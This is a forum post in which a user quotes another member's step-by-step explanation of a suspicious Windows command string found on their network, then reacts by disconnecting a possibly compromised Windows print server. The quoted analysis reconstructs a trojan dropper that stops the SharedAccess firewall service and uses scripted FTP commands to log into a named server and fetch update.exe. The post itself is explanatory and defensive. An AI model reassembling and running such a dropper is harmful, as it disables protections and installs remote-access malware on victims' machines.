Quote:
Originally Posted by chucker
Let's analyze:
- cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
- net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
- echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
- ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe.
- Finally, net start sharedacc launches the service again.
We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access. |
Nice. So how the heck did it get on my network and how did it send System Preferences this text?
And, more importantly, how can I protect myself from this happening again? Shit. I just remembered that I've got a Windows computer on the network. It's really just a print server (an old HP laserjet that just won't die). I bet it's compromised. Luckily there's nothing on it but Win2k and some music...
Ok. That Windows box is officially off the network.